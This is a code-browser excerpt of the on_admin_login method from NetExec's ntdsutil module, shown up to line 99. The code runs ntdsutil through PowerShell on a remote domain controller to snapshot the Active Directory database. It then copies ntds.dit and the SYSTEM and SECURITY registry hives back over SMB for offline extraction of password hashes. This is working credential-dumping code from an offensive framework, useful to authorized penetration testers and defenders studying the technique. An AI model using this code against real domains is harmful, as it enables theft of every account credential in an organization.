MCPcopy
hub / github.com/Pennyw0rth/NetExec / on_admin_login

Method on_admin_login

nxc/modules/ntdsutil.py:42–179  ·  view source on GitHub ↗
(self, context, connection)

Source from the content-addressed store, hash-verified

40 self.no_delete = True
41
42 def on_admin_login(self, context, connection):
43 command = f"powershell \"ntdsutil.exe 'ac i ntds' 'ifm' 'create full {self.tmp_dir}{self.dump_location}' q q\""
44 context.log.display(f"Dumping ntds with ntdsutil.exe to {self.tmp_dir}{self.dump_location}")
45 context.log.highlight("Dumping the NTDS, this could take a while so go grab a redbull...")
46 context.log.debug(f"Executing command {command}")
47 p = connection.execute(command, True)
48 context.log.debug(p)
49 if "success" in p:
50 context.log.success(f"NTDS.dit dumped to {self.tmp_dir}{self.dump_location}")
51 else:
52 context.log.fail("Error while dumping NTDS")
53 return
54
55 os.makedirs(self.dir_result, exist_ok=True)
56 os.makedirs(os.path.join(self.dir_result, "Active Directory"), exist_ok=True)
57 os.makedirs(os.path.join(self.dir_result, "registry"), exist_ok=True)
58
59 context.log.display(f"Copying NTDS dump to {self.dir_result}")
60
61 context.log.debug("Copy ntds.dit to host")
62 with open(os.path.join(self.dir_result, "Active Directory", "ntds.dit"), "wb+") as dump_file:
63 try:
64 connection.conn.getFile(
65 self.share,
66 f"{self.tmp_share}{self.dump_location}\\Active Directory\\ntds.dit",
67 dump_file.write,
68 )
69 context.log.debug("Copied ntds.dit file")
70 except Exception as e:
71 context.log.fail(f"Error while get ntds.dit file: {e}")
72
73 context.log.debug("Copy SYSTEM to host")
74 with open(os.path.join(self.dir_result, "registry", "SYSTEM"), "wb+") as dump_file:
75 try:
76 connection.conn.getFile(
77 self.share,
78 f"{self.tmp_share}{self.dump_location}\\registry\\SYSTEM",
79 dump_file.write,
80 )
81 context.log.debug("Copied SYSTEM file")
82 except Exception as e:
83 context.log.fail(f"Error while get SYSTEM file: {e}")
84
85 context.log.debug("Copy SECURITY to host")
86 with open(os.path.join(self.dir_result, "registry", "SECURITY"), "wb+") as dump_file:
87 try:
88 connection.conn.getFile(
89 self.share,
90 f"{self.tmp_share}{self.dump_location}\\registry\\SECURITY",
91 dump_file.write,
92 )
93 context.log.debug("Copied SECURITY file")
94 except Exception as e:
95 context.log.fail(f"Error while get SECURITY file: {e}")
96
97 context.log.display(f"NTDS dump copied to {self.dir_result}")
98
99 try:

Callers

nothing calls this directly

Calls 10

highlightFunction · 0.90
displayMethod · 0.80
successMethod · 0.80
failMethod · 0.80
formatMethod · 0.80
finishMethod · 0.80
highlightMethod · 0.45
executeMethod · 0.45
get_hostsMethod · 0.45
dumpMethod · 0.45

Tested by

no test coverage detected